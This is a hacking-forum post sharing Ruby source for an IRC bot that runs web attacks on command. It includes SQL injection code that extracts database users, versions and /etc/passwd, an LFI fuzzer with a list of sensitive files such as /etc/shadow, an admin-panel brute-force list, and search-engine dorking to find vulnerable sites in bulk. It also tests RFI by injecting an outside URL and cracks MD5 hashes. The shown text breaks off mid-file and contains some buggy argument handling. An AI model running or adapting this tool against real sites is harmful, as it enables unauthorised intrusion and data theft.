Inicio
Buscar
Ingresar
Registrarse
Starfield: el juego que revolucionará el espacio y la tecnología
Hack x Crack - Comunidad de Seguridad informática
»
Programación
»
Scripting
»
[Ruby] ClapTrap IRC Bot 0.5
Imprimir
Páginas: [
1
]
Ir Abajo
Autor
Tema: [Ruby] ClapTrap IRC Bot 0.5 (Leído 5887 veces)
BigBear
{ L5 } Smurf
Mensajes: 594
[Ruby] ClapTrap IRC Bot 0.5
«
en:
Septiembre 26, 2015, 12:04:10 am »
Traduccion a Ruby de mi bot para IRC llamado ClapTrap.
Tiene las siguiente opciones :
Scanner SQLI
Scanner LFI
Buscador de panel de administracion
Localizador de IP
Buscador de DNS
Buscador de SQLI y RFI en google
Crack para hashes MD5
Cortador de URL usando tinyurl
HTTP FingerPrinting
Codificador base64,hex y ASCII
El codigo :
Código: Ruby
#!usr/bin/ruby
#Claptrap IRC Bot 0.5
#(C) Doddy Hackman 2015
require
"socket"
require
"open-uri"
require
"net/http"
require
"resolv"
require
"base64"
require
"digest/md5"
$timeout
=
"1"
# Functions
def
head
(
)
print
"
\n
\n
@@@@ @ @ @@@@@ @@@@@ @@@@@ @ @@@@@ @ @@@@@ @@@@
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @@@@@ @ @@@@@ @ @ @@@@@ @ @@@@@ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @@@@@ @ @ @ @ @@@@@ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@@@@ @@@@@@ @ @ @ @ @ @ @ @ @ @ @ @@@@
\n
\n
"
end
def
copyright
(
)
print
"
\n
\n
-- == (C) Doddy Hackman 2015 == --
\n
\n
"
end
#
# Functions ClapTrap
def
get_ip
(
hostname
)
begin
return
Resolv.
getaddress
(
hostname
)
rescue
return
"Error"
end
end
def
toma
(
web
)
begin
return
open
(
web,
"User-Agent"
=>
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
)
.
read
rescue
return
"Error"
end
end
def
response_code
(
web
)
begin
return
Net::HTTP
.
get_response
(
URI
(
web
)
)
.
code
rescue
return
"404"
end
end
def
tomar
(
web,arg
)
begin
headers =
{
"User-Agent"
=>
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
}
uri =
URI
(
web
)
http =
Net::HTTP
.
new
(
uri.
host
, uri.
port
)
return
http.
post
(
uri.
path
,arg, headers
)
.
body
rescue
return
"Error"
end
end
def
toma_ssl
(
web
)
uri =
URI
.
parse
(
web
)
nave =
Net::HTTP
.
new
(
uri.
host
, uri.
port
)
nave.
use_ssl
=
true
nave.
verify_mode
=
OpenSSL::SSL::VERIFY_NONE
return
nave.
get
(
uri.
request_uri
,
{
"User-Agent"
=>
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"
}
)
.
body
end
def
cortar
(
pages
)
final =
""
finales =
[
]
pages.
flatten
.
each
do
|
page
|
if
page=~
/
(
.
*
)
=
(
.
*
)
/
parte1 = $1
parte2 = $2
final = parte1
+
"="
finales.
push
(
final
)
end
end
return
finales
end
def
google
(
dork,pages
)
links =
[
]
dork = dork.
sub
(
/
/
,
"+"
)
contador =
0
for
i
in
(
"1"
..
pages
)
contador
+
=
10
code = toma_ssl
(
"https://www.google.com.ar/search?hl=&q="
+
dork
+
"&start="
+
contador.
to_s
)
paginas = code.
scan
(
/
(
?
<
=
"r"
><
.
href
=
")(.+?)"
/
)
paginas.
flatten
.
each
do
|
pagina
|
partes = pagina
if
partes=~
/
url\?q=
(
.
*
)
&
amp;sa
/
parte = $1
link =
URI
::decode
(
parte
)
links.
push
(
link
)
end
end
end
links = links.
uniq
return
links
end
def
google_recursive
(
dork,pages
)
dork = dork.
sub
(
/
/
,
"+"
)
contador =
0
guardo =
[
]
for
i
in
(
"1"
..
pages
)
contador
+
=
10
url =
"https://www.google.com.ar/search?hl=&q="
+
dork
+
"&start="
+
contador.
to_s
code = toma_ssl
(
url
)
links =
URI
::extract
(
code
)
links.
each
do
|
link
|
if
link=~
/
cache:
(
.
*
?
)
:
(
.
*
?
)
\
+/
link_final =
"http://"
+
$2
link_final =
URI
::decode
(
link_final
)
guardo.
push
(
link_final
)
end
end
end
guardo = guardo.
uniq
return
guardo
end
def
bing
(
dork,pages
)
guardo =
[
]
dork = dork.
sub
(
/
/
,
"+"
)
contador =
0
for
i
in
(
"1"
..
pages
)
contador
+
=
10
code = toma
(
"http://www.bing.com/search?q="
+
dork
+
"&first="
+
contador.
to_s
)
links = code.
scan
(
/<
h2
><
a href=
"(.*?)"
h
/
)
links.
flatten
.
each
do
|
link
|
link_final =
URI
::decode
(
link
)
if
not
link_final=~
/
http:\
/
\
/
778802
\.
r
\.
msn
\.
com
\
//
guardo.
push
(
link_final
)
end
end
links = code.
scan
(
/<
h3
><
a href=
"(.*?)"
h
/
)
links.
flatten
.
each
do
|
link
|
link_final =
URI
::decode
(
link
)
if
not
link_final=~
/
http:\
/
\
/
778802
\.
r
\.
msn
\.
com
\
//
guardo.
push
(
link_final
)
end
end
end
guardo = guardo.
uniq
return
guardo
end
def
bypass
(
op
)
if
op==
"--"
return
"+"
,
"--"
elsif
op==
"/*"
return
"/**/"
,
"/**/"
elsif
op==
"%20"
return
"%20"
,
"%00"
else
return
"+"
,
"--"
end
end
def
decode_hex
(
text
)
text = text.
sub
(
"0x"
,
""
)
return
[
text
]
.
pack
(
'H*'
)
end
def
encode_hex
(
text
)
return
"0x"
+
text.
unpack
(
'H*'
)
[
0
]
end
def
httpfinger
(
page
)
respuesta =
""
begin
nave =
Net::HTTP
.
start
(
page
)
headers = nave.
head
(
"/"
)
headers.
each
do
|
name,value
|
respuesta = respuesta
+
"[+] "
+
name
+
" : "
+
value
+
"
\n
"
end
nave.
finish
rescue
respuesta =
"Error"
end
return
respuesta
end
##
def
locateip
(
target
)
resultado =
""
resultado = resultado
+
"
\n
[+] Getting IP ...
\n
"
ip = get_ip
(
target
)
resultado = resultado
+
"
\n
[+] IP : "
+
ip
+
"
\n
"
web =
"http://www.melissadata.com/lookups/iplocation.asp"
resultado = resultado
+
"
\n
[+] Locating ...
\n
\n
"
code = tomar
(
web,
"ipaddress="
+
ip
+
"&btn=Submit"
)
if
code=~
/
City
<
\
/
td
><
td align=
(
.
*
)
><
b
>
(
.
*
)
<
\
/
b
><
\
/
td
>/
resultado = resultado
+
"[+] City : "
+
$2
+
"
\n
"
else
resultado = resultado
+
"[+] City : Not Found
\n
"
end
if
code=~
/
Country
<
\
/
td
><
td align=
(
.
*
)
><
b
>
(
.
*
)
<
\
/
b
><
\
/
td
>/
resultado = resultado
+
"[+] Country : "
+
$2
+
"
\n
"
else
resultado = resultado
+
"[+] Country : Not Found
\n
"
end
if
code=~
/
State
or
Region
<
\
/
td
><
td align=
(
.
*
)
><
b
>
(
.
*
)
<
\
/
b
><
\
/
td
>/
resultado = resultado
+
"[+] State or Region : "
+
$2
+
"
\n
"
;
else
resultado = resultado
+
"[+] State of Region : Not Found
\n
"
end
resultado = resultado
+
"
\n
[+] Getting DNS ...
\n
\n
"
control =
"0"
code = toma
(
"http://www.ip-adress.com/reverse_ip/"
+
ip
)
dnss = code.
scan
(
/
whois\
/
(
.
*
?
)
\
">Whois/)
dnss.flatten.each do |dns|
begin
if dns != "
"
control = "
1
"
resultado = resultado + "
[
+
]
DNS Found :
"+dns
end
end
end
if control=="
0
"
resultado = resultado + "
\n
[
-
]
DNS
Not
Found\n
"
end
return resultado
end
def details(url,by)
pass1,pass2 = bypass(by)
resultado = "
"
hextest = "
0x2f6574632f706173737764
" #/etc/passwd
hextest = "
0x633A2F78616D70702F726561642E747874
" #c:/xampp/read.txt
web1 = url.sub(/hackman/,"
0x4b30425241
")
web2 = url.sub(/hackman/,"
concat
(
0x4b30425241,user
(
)
,0x4b30425241,database
(
)
,0x4b30425241,version
(
)
,0x4b30425241
)
")
web3 = url.sub(/hackman/,"
unhex
(
hex
(
concat
(
char
(
69
,
82
,
84
,
79
,
82
,
56
,
53
,
52
)
,load_file
(
"+hextest+"
)
)
)
)
")
resultado = resultado + "
\n
[
+
]
Extracting information of the DB\n
"
code1 = toma(web2)
if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
user,data,ver = $1,$2,$3
resultado = resultado + "
\n
[
+
]
Username :
"+user
resultado = resultado + "
\n
[
+
]
Database :
"+data
resultado = resultado + "
\n
[
+
]
Version :
"+ver+"
\n\n
"
else
resultado = resultado + "
[
-
]
Not
Found\n
"
end
code2 = toma(web1+pass1+"
from
"+pass1+"
mysql.
user
"+pass2)
code3 = toma(web1+pass1+"
from
"+pass1+"
information_schema.
tables
"+pass2)
code4 = toma(web3)
if code2=~/K0BRA/
resultado = resultado + "
[
+
]
Mysql User : ON\n
"
end
if code3=~/K0BRA/
resultado = resultado + "
[
+
]
information_schema : ON\n
"
end
if code4=~/ERTOR854/
resultado = resultado + "
[
+
]
load_file : ON\n
"
end
return resultado
end
def findlength(url,by)
pass1,pass2 = bypass(by)
z = "
1
"
control = "
0
"
resultado = "
"
resultado = resultado + "
\n
[
+
]
Finding columns lenght ...\n\n
"
x = "
concat
(
0x4b30425241,
1
,0x4b30425241
)
"
for num in ('2'..'25')
z = z+"
,
"+num
x= x+"
,
"+"
concat
(
0x4b30425241,
"+num+"
,0x4b30425241
)
"
code = toma(url+"
1
"+pass1+"
and
"+pass1+"
1
=
0
"+pass1+"
union
"+pass1+"
select
"+pass1+x)
if code=~/K0BRA(.*?)K0BRA/
resultado = resultado + "
[
+
]
The Page has
"+num+"
columns\n
"
resultado = resultado + "
[
+
]
The number
"+$1+"
print
data\n
"
z = z.sub($1,"
hackman
")
sqli = url+"
1
"+pass1+"
and
"+pass1+"
1
=
0
"+pass1+"
union
"+pass1+"
select
"+pass1+z
control = "
1
"
break
end
end
if control != "
1
"
resultado = resultado + "
[
-
]
Columns lenght
not
found\n
"
end
return resultado,sqli,control
end
def scanner_sqli(page,by)
pass1,pass2 = bypass(by)
resultado = "
"
rta1 = "
"
rta2 = "
"
resultado = resultado + "
[
+
]
Testing vulnerability ...\n\n
"
codeuno = toma(page+"
1
"+pass1+"
and
"+pass1+"
1
=
0
"+pass2)
codedos = toma(page+"
1
"+pass1+"
and
"+pass1+"
1
=
1
"+pass2)
if codeuno != codedos
resultado = resultado + "
[
+
]
Vulnerable !\n
"
rta1,sqli,control = findlength(page,by)
if control=="
1
"
rta2 = details(sqli,"
--
")
end
else
resultado = resultado + "
[
-
]
Not
Vulnerable\n
"
end
resultado = resultado + rta1 + rta2
return resultado
end
def scanner_lfi(web)
resultado = "
"
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:
\P
rogramFiles
\A
pacheGroup
\A
pache
\l
ogs
\a
ccess.log','C:
\P
rogramFiles
\A
pacheGroup
\A
pache
\l
ogs
\e
rror.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
resultado = resultado + "
[
+
]
Testing the vulnerability LFI...\n\n
"
code = toma(web+"
'")
if code=~/No such file or directory in <b>(.*)<
\/
b> on line/
fpd = $1
resultado = resultado + "[+] LFI Detected
\n
\n
"
resultado = resultado + "[Full Path Discloure]: "+fpd+"
\n
"
resultado = resultado + "
\n
[+] Fuzzing Files
\n
\n
"
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
resultado= resultado + "[Link] : "+web+file+"
\n
"
end
end
resultado = resultado + "
\n
[+] Done
\n
"
else
resultado = resultado + "[-] Not Vulnerable to LFI
\n
\n
"
end
return resultado
end
def scanner_panel(page)
resultado = ""
panels = ['
admin
/
admin.
asp
','
admin
/
login.
asp
','
admin
/
index.
asp
','
admin
/
admin.
aspx
','
admin
/
login.
aspx
','
admin
/
index.
aspx
','
admin
/
webmaster.
asp
','
admin
/
webmaster.
aspx
','
asp
/
admin
/
index.
asp
','
asp
/
admin
/
index.
aspx
','
asp
/
admin
/
admin.
asp
','
asp
/
admin
/
admin.
aspx
','
asp
/
admin
/
webmaster.
asp
','
asp
/
admin
/
webmaster.
aspx
','
admin
/
','
login.
asp
','
login.
aspx
','
admin.
asp
','
admin.
aspx
','
webmaster.
aspx
','
webmaster.
asp
','
login
/
index.
asp
','
login
/
index.
aspx
','
login
/
login.
asp
','
login
/
login.
aspx
','
login
/
admin.
asp
','
login
/
admin.
aspx
','
administracion
/
index.
asp
','
administracion
/
index.
aspx
','
administracion
/
login.
asp
','
administracion
/
login.
aspx
','
administracion
/
webmaster.
asp
','
administracion
/
webmaster.
aspx
','
administracion
/
admin.
asp
','
administracion
/
admin.
aspx
','
php
/
admin
/
','
admin
/
admin.
php
','
admin
/
index.
php
','
admin
/
login.
php
','
admin
/
system
.
php
','
admin
/
ingresar.
php
','
admin
/
administrador.
php
','
admin
/
default.
php
','
administracion
/
','
administracion
/
index.
php
','
administracion
/
login.
php
','
administracion
/
ingresar.
php
','
administracion
/
admin.
php
','
administration
/
','
administration
/
index.
php
','
administration
/
login.
php
','
administrator
/
index.
php
','
administrator
/
login.
php
','
administrator
/
system
.
php
','
system
/
','
system
/
login.
php
','
admin.
php
','
login.
php
','
administrador.
php
','
administration.
php
','
administrator.
php
','
admin1.
html
','
admin1.
php
','
admin2.
php
','
admin2.
html
','
yonetim.
php
','
yonetim.
html
','
yonetici.
php
','
yonetici.
html
','
adm
/
','
admin
/
account.
php
','
admin
/
account.
html
','
admin
/
index.
html
','
admin
/
login.
html
','
admin
/
home.
php
','
admin
/
controlpanel.
html
','
admin
/
controlpanel.
php
','
admin.
html
','
admin
/
cp.
php
','
admin
/
cp.
html
','
cp.
php
','
cp.
html
','
administrator
/
','
administrator
/
index.
html
','
administrator
/
login.
html
','
administrator
/
account.
html
','
administrator
/
account.
php
','
administrator.
html
','
login.
html
','
modelsearch
/
login.
php
','
moderator.
php
','
moderator.
html
','
moderator
/
login.
php
','
moderator
/
login.
html
','
moderator
/
admin.
php
','
moderator
/
admin.
html
','
moderator
/
','
account.
php
','
account.
html
','
controlpanel
/
','
controlpanel.
php
','
controlpanel.
html
','
admincontrol.
php
','
admincontrol.
html
','
adminpanel.
php
','
adminpanel.
html
','
admin1.
asp
','
admin2.
asp
','
yonetim.
asp
','
yonetici.
asp
','
admin
/
account.
asp
','
admin
/
home.
asp
','
admin
/
controlpanel.
asp
','
admin
/
cp.
asp
','
cp.
asp
','
administrator
/
index.
asp
','
administrator
/
login.
asp
','
administrator
/
account.
asp
','
administrator.
asp
','
modelsearch
/
login.
asp
','
moderator.
asp
','
moderator
/
login.
asp
','
moderator
/
admin.
asp
','
account.
asp
','
controlpanel.
asp
','
admincontrol.
asp
','
adminpanel.
asp
','
fileadmin
/
','
fileadmin.
php
','
fileadmin.
asp
','
fileadmin.
html
','
administration.
html
','
sysadmin.
php
','
sysadmin.
html
','
phpmyadmin
/
','
myadmin
/
','
sysadmin.
asp
','
sysadmin
/
','
ur
-
admin.
asp
','
ur
-
admin.
php
','
ur
-
admin.
html
','
ur
-
admin
/
','
Server.
php
','
Server.
html
','
Server.
asp
','
Server
/
','
wp
-
admin
/
','
administr8.
php
','
administr8.
html
','
administr8
/
','
administr8.
asp
','
webadmin
/
','
webadmin.
php
','
webadmin.
asp
','
webadmin.
html
','
administratie
/
','
admins
/
','
admins.
php
','
admins.
asp
','
admins.
html
','
administrivia
/
','
Database_Administration
/
','
WebAdmin
/
','
useradmin
/
','
sysadmins
/
','
admin1
/
','
system
-
administration
/
','
administrators
/
','
pgadmin
/
','
directadmin
/
','
staradmin
/
','
ServerAdministrator
/
','
SysAdmin
/
','
administer
/
','
LiveUser_Admin
/
','
sys
-
admin
/
','
typo3
/
','
panel
/
','
cpanel
/
','
cPanel
/
','
cpanel_file
/
','
platz_login
/
','
rcLogin
/
','
blogindex
/
','
formslogin
/
','
autologin
/
','
support_login
/
','
meta_login
/
','
manuallogin
/
','
simpleLogin
/
','
loginflat
/
','
utility_login
/
','
showlogin
/
','
memlogin
/
','
members
/
','
login
-
redirect
/
','
sub
-
login
/
','
wp
-
login
/
','
login1
/
','
dir
-
login
/
','
login_db
/
','
xlogin
/
','
smblogin
/
','
customer_login
/
','
UserLogin
/
','
login
-
us
/
','
acct_login
/
','
admin_area
/
','
bigadmin
/
','
project
-
admins
/
','
phppgadmin
/
','
pureadmin
/
','
sql
-
admin
/
','
radmind
/
','
openvpnadmin
/
','
wizmysqladmin
/
','
vadmind
/
','
ezsqliteadmin
/
','
hpwebjetadmin
/
','
newsadmin
/
','
adminpro
/
','
Lotus_Domino_Admin
/
','
bbadmin
/
','
vmailadmin
/
','
Indy_admin
/
','
ccp14admin
/
','
irc
-
macadmin
/
','
banneradmin
/
','
sshadmin
/
','
phpldapadmin
/
','
macadmin
/
','
administratoraccounts
/
','
admin4_account
/
','
admin4_colon
/
','
radmind
-
1
/
','
Super
-
Admin
/
','
AdminTools
/
','
cmsadmin
/
','
SysAdmin2
/
','
globes_admin
/
','
cadmins
/
','
phpSQLiteAdmin
/
','
navSiteAdmin
/
','
server_admin_small
/
','
logo_sysadmin
/
','
server
/
','
database_administration
/
','
power_user
/
','
system_administration
/
','
ss_vms_admin_sm
/
']
resultado = resultado + "[+] Scanning ...
\n
\n
"
control = "0"
panels.each do |panel|
begin
url = page+"/"+panel
status_code = response_code(url)
if status_code=="200"
resultado = resultado + "[+] Link : "+url+"
\n
"
control = "1"
end
end
end
if control=="1"
resultado = resultado + "
\n
[+] Done
\n
"
else
resultado = resultado + "
\n
[-] Not Found
\n
"
end
return resultado
end
def get_httpfinger(page)
resultado = ""
resultado = resultado + "[+] Searching ...
\n
\n
"
resultado = resultado + httpfinger(page)
return resultado
end
def crack_md5(md5)
resultado = ""
resultado = resultado + "[+] Cracking ...
\n
\n
"
code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
if code=~/pass : <b>(.*?)<
\/
b>/
password = $1
resultado = resultado + "[+] md5online.net -> "+password+"
\n
"
else
resultado = resultado + "[-] md5online.net -> Not Found" + "
\n
"
end
code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
if code=~/<span class='
middle_title
'>Hashed string<
\/
span>: (.*?)<
\/
div>/
password = $1
resultado = resultado + "[+] md5.my-addr.co -> "+password+"
\n
"
else
resultado = resultado + "[-] md5.my-addr.co -> Not Found" +"
\n
"
end
code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
if code=~/Decrypted Text: <
\/
b>(.*?)<
\/
font>/
password = $1
resultado = resultado + "[+] md5decryption.com -> "+password+"
\n
"
else
resultado = resultado + "[-] md5decryption.com -> Not Found"+"
\n
"
end
return resultado
end
def tiny_url(page)
resultado = ""
code = toma("http://tinyurl.com/api-create.php?url="+page)
if code=~/http/
resultado = resultado + "[+] Link : "+code
else
resultado = resultado + "[-] Error"
end
return resultado
end
def codificar_hex(text)
return "[+] Result : "+encode_hex(text)
end
def decodificar_hex(text)
return "[+] Result : "+decode_hex(text)
end
def codificar_base64(text)
return "[+] Result : "+Base64.encode64(text).chomp
end
def decodificar_base64(text)
return "[+] Result : "+Base64.decode64(text).chomp
end
def codificar_ascii(text)
resultado = ""
resultado = resultado + "[+] Result : "+text.split("").map(&:ord).to_s
return resultado
end
def md5_encode(text)
return "[+] Result : "+Digest::MD5.hexdigest(text).chomp
end
def scanner_dns(domain)
paths = ["www","www1","www2","www3","ftp","ns","mail","3com","aix","apache","back","bind","boreder","bsd","business","chains","cisco","content","corporate","cpv","dns","domino","dominoserver","download","e-mail","e-safe","email","esafe","external","extranet","firebox","firewall","front","fw","fw0","fwe","fw-1","firew","gate","gatekeeper","gateway","gauntlet","group","help","hop","hp","hpjet","hpux","http","https","hub","ibm","ids","info","inside","internal","internet","intranet","ipfw","irix","jet","list","lotus","lotusdomino","lotusnotes","lotusserver","mailfeed","mailgate","mailgateway","mailgroup","mailhost","maillist","mailpop","mailrelay","mimesweeper","ms","msproxy","mx","nameserver","news","newsdesk","newsfeed","newsgroup","newsroom","newsserver","nntp","notes","noteserver","notesserver","nt","outside","pix","pop","pop3","pophost","popmail","popserver","print","printer","private","proxy","proxyserver","public","qpop","raptor","read","redcreek","redhat","route","router","scanner","screen","screening","ecure","seek","smail","smap","smtp","smtpgateway","smtpgw","solaris","sonic","spool","squid","sun","sunos","suse","switch","transfer","trend","trendmicro","vlan","vpn","wall","web","webmail","webserver","webswitch","win2000","win2k","upload","file","fileserver","storage","backup","share","core","gw","wingate","main","noc","home","radius","security","access","dmz","domain","sql","mysql","mssql","postgres","db","database","imail","imap","exchange","sendmail","louts","test","logs","stage","staging","dev","devel","ppp","chat","irc","eng","admin","unix","linux","windows","apple","hp-ux","bigip","pc"]
resultado = ""
resultado = resultado + "[+] Searching DNS ...
\n
\n
"
control = "0"
paths.each do |path|
begin
url = "http://"+path+"."+domain
status_code = response_code(url)
if status_code=="200"
resultado = resultado + "[+] Link : "+url+"
\n
"
control = "1"
end
end
end
if control=="1"
resultado = resultado + "
\n
[+] Done
\n
"
else
resultado = resultado + "
\n
[-] Not Found
\n
"
end
return resultado
end
def sqli_finder(dork,pages,opcion)
resultado = ""
if opcion=="bing"
resultado = resultado + "[+] Searching in Bing ...
\n
\n
"
links = cortar(bing(dork,pages))
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"
\n
\n
"
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found
\n
"
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
resultado = resultado + " [OK]
\n
"
else
resultado = resultado + " [FAIL]
\n
"
end
rescue
resultado = resultado + " [FAIL]
\n
"
end
end
resultado = resultado + "
\n
[+] Finished
\n
"
elsif opcion=="google"
resultado = resultado + "[+] Searching in Google ...
\n
\n
"
links = cortar(google(dork,pages))
if links.count.to_s=="0"
resultado = resultado + "[+] Searching in Google again ...
\n
\n
"
links = cortar(google_recursive(dork,pages))
end
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"
\n
\n
"
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found"
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
resultado = resultado + " [OK]
\n
"
else
resultado = resultado + " [FAIL]
\n
"
end
rescue
resultado = resultado + " [FAIL]
\n
"
end
end
else
resultado = "[-] Bad Option"
end
return resultado
end
def rfi_finder(dork,pages,opcion)
resultado = ""
if opcion=="bing"
resultado = resultado + "[+] Searching in Bing ...
\n
\n
"
links = cortar(bing(dork,pages))
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"
\n
\n
"
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found
\n
"
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "http://www.supertangas.com/")
if url=~/Los mejores TANGAS de la red/i
resultado = resultado + " [OK]
\n
"
else
resultado = resultado + " [FAIL]
\n
"
end
rescue
resultado = resultado + " [FAIL]
\n
"
end
end
resultado = resultado + "
\n
[+] Finished
\n
"
elsif opcion=="google"
resultado = resultado + "[+] Searching in Google ...
\n
\n
"
links = cortar(google(dork,pages))
if links.count.to_s=="0"
resultado = resultado + "[+] Searching in Google again ...
\n
\n
"
links = cortar(google_recursive(dork,pages))
end
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"
\n
\n
"
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found"
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "http://www.supertangas.com/")
if url=~/Los mejores TANGAS de la red/i
resultado = resultado + " [OK]
\n
"
else
resultado = resultado + " [FAIL]
\n
"
end
rescue
resultado = resultado + " [FAIL]
\n
"
end
end
else
resultado = "[-] Bad Option"
end
return resultado
end
#
def respuesta(to,texto)
resultado = texto.split("
\n
")
resultado.flatten.each do |linea|
if linea != ""
$irc.print "PRIVMSG #{to} #{linea}
\n
"
sleep $timeout.to_i
end
end
end
def bot_online(host,port,canal,admin)
print "
\n
[+] Connecting ...
\n
"
begin
$irc = TCPSocket.open(host,port)
rescue
print "
\n
[-] Error connecting
\n
"
else
nick = "ClapTrap"
$irc.print "NICK "+nick+"
\r
\n
"
$irc.print "USER "+nick+" 1 1 1 1
\r
\n
"
$irc.print "JOIN #{canal}
\r
\n
"
print "
\n
[+] Online
\n
"
while 1
code = $irc.recv(9999)
if code=~/PING (.*)/
$irc.print "PONG #{$1}
\n
"
end
if code=~/:(.*)!(.*) PRIVMSG (.*)
.*)/
dedonde = $1
mensaje = $4
if dedonde==admin
if mensaje=~/!sqli (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,scanner_sqli(arg1,"--"))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
if mensaje=~/!lfi (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,scanner_lfi(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
if mensaje=~/!panel(.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,scanner_panel(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
if mensaje=~/!fuzzdns (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,scanner_dns(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
if mensaje=~/!locateip (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin, locateip(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
if mensaje=~/!sqlifinder (.*) (.*) (.*)/
arg1 = $1
arg2 = $2
arg3 = $3
arg1 = arg1.chomp
arg2 = arg2.chomp
arg3 = arg3.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,sqli_finder(arg1,arg2,arg3))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
if mensaje=~/!rfifinder (.*) (.*) (.*)/
arg1 = $1
arg1 = $2
arg1 = $3
arg1 = arg1.chomp
arg2 = arg2.chomp
arg3 = arg3.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,rfi_finder(arg1,arg2,arg3))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
